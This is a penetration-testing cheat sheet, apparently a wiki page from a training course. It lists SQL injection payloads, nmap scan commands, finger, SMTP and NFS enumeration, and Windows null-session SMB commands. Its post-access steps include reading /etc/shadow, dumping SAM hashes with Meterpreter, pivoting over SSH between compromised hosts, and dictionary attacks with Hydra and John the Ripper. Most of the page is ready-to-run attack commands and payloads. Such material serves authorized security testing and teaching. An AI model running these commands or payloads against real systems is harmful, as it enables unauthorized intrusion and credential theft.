Don't forget to use data collected from previously hacked machines.

  • Passwords
  • Try to exploit trust associations between machines, ssh from one hacked machine to another.

Ports Associated with Known Vulnerabilities

Books24x7 (ISSAIC)

SQL Injection

'or 1=1--

'; if user ='dbo' waitfor delay '0:0:5 '--


nmap -sV -PN -n -p1- -reason -oN nmap_services.txt <ip range>
nmap -sS -PN -n -p1- -T4 -reason <ip range> -oN nmap_full.txt
nmap -sU -PN -n -F -reason -oN nmap_udp.txt


Finger - Shows what users are on a machine

finger @
finger yoda@
finger -b -p chewbacca









  • Can be used to identify user accounts
    • VRFY
    • EXPN


rpcinfo -p <computer name>
If NFS and MOUNTD are present:
showmount -e <computer name>
mount <computer name>:/ /mnt

Vulnerable Services

  • SSH
    • OpenSSH <2.3.0
    • SSH 1.2.24-1.2.31

After getting access:

  • Check /etc/passwd
  • Check /etc/shadow
  • Check web server folder
  • Check history file for passwords


Common Windows Vulnerabilities

Windows Services Typically Targeted by Enumeration Attacks

Port Service
TCP 53 DNS zone transfer
TCP 135 Microsoft RPC Endpoint Mapper
UDP 137 NetBIOS Name Service (NBNS)
TCP 139 NetBIOS session service (SMB over NetBIOS)
TCP 445 SMB over TCP (Direct Host)
UDP 161 Simple Network Management Protocol (SNMP)
TCP/UDP 389 Lightweight Directory Access Protocol (LDAP)
TCP/UDP 3268 Global Catalog Service
TCP 3389 Terminal Services

Windows NET commands

After getting access:

  • Check Documents and Settings folder
  • Use Meterpreter to pull SAM file hashes
  • Use hydra to run dictionary attack against SMB
C:\>whoami /user /groups

The SAM makes up one of the five Registry hives and is implemented in the file %systemroot%\ system32\config\sam.

SMB Enumeration

Assuming TCP port 139 or 445 is shown listening by a previous port scan:

C:\>net use \\\IPC$ "" /u:""

From a Win XP command prompt:
* NET VIEW \\ip-address  
 * Fails
* NET USE \\ip-address\IPC$ "" /u:""
 * Creates the null session
* Username="" Password=""
* NET VIEW \\ip-address  
 * Works now

The command completed successfully.

This syntax connects to the hidden interprocess communications “share” (IPC$) at IP address as the built-in anonymous user (/u: “”) with a null (“”) password. If successful, the attacker now has an open channel over which to attempt all the various techniques outlined in the rest of this section to pillage as much information as possible from the target: network information, shares, users, groups, Registry keys, and so on.


C:\>net use \\\ipc$ password /u:domain\Administrator

SMB Tools

One of the best tools for enumerating Windows systems is DumpSec

Another great enumeration tool written by Sir Dystic, called nete (NetE), will extract a wealth of information from a null session connection. We like to use the /0 switch to perform all checks.

Web Servers

  • Run nikto against web server
  • Make sure you run nmap -sV to find a hidden webserver
  • Try htaccess/htpasswd file
  • Check source of each page
  • Most likely there's a SQL injection on a login box
  • Don't forget ../../ attacks

Password Cracking


Hydra v5.4 [] (c) 2006 by van Hauser / THC

Syntax: ./hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] 
smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp 
rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd

OPT some service modules need special input (see README!)

John the Ripper


john -w=/user/student1/tools/wordlists/wordlist  file_to_be_crack
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.